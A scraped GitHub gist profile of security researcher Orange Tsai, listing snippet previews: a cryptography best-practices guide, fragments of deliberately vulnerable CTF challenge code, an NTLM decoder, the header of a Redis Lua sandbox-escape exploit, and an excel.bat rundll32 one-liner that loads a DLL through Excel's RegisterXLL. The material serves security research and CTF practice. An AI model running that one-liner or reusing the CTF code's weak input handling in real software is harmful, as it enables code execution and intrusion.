Skip to content

Instantly share code, notes, and snippets.

View orangetw's full-sized avatar
This is orange!

Orange Tsai orangetw

This is orange!
View GitHub Profile
#!/usr/bin/env python
import web, settings
urls = (
'/uploads/(.*)', 'download',
'([a-z0-9\/]*)', 'dispatcher'
class dispatcher:
orangetw / gist:eae51418694bcb34cbf7
Created May 24, 2015 14:29
(Updated) Cryptographic Right Answers
**Encrypting data** (*Was: AES-CTR with HMAC*): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM.
*You care about this if: you're hiding information from users or the network.*
All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.
*Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.*
**Symmetric key length** (*Was: Use 256 bit keys*
orangetw / index.php
Created October 19, 2015 07:28
HITCON CTF 2015 Quals Giraffe's Coffee
include "config.php";
mysql_connect($dbhost, $dbuser, $dbpass);
function escape($str){
$str = strtolower($str);
$str = str_replace("'", "", $str);
$str = str_replace("\\", "", $str);
orangetw / sqlpwn.php
Created September 10, 2015 13:49
AIS3 Final CTF Web
sqlpwn by orange
Don't brute force or you will be banned !
include "template.html";
orangetw / babyfirst.php
Created October 19, 2015 07:17
HITCON CTF 2015 Quals Babyfirst
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
orangetw /
Created November 19, 2017 19:52 — forked from nicolas-grekas/
Advanced handling of HTTP requests in PHP
orangetw /
Created May 21, 2021 09:20 — forked from aseering/
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <>
## with additional detail subsequently added from the official protocol spec:
## <>
orangetw /
Created February 12, 2019 15:43 — forked from c3c/
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system"
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
orangetw / excel.bat
Created July 22, 2017 10:17 — forked from ryhanson/
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
#!/usr/bin/sudo sh
## -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings`:
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
## Well, good, as long as its not intended to discourage *me* from doing this!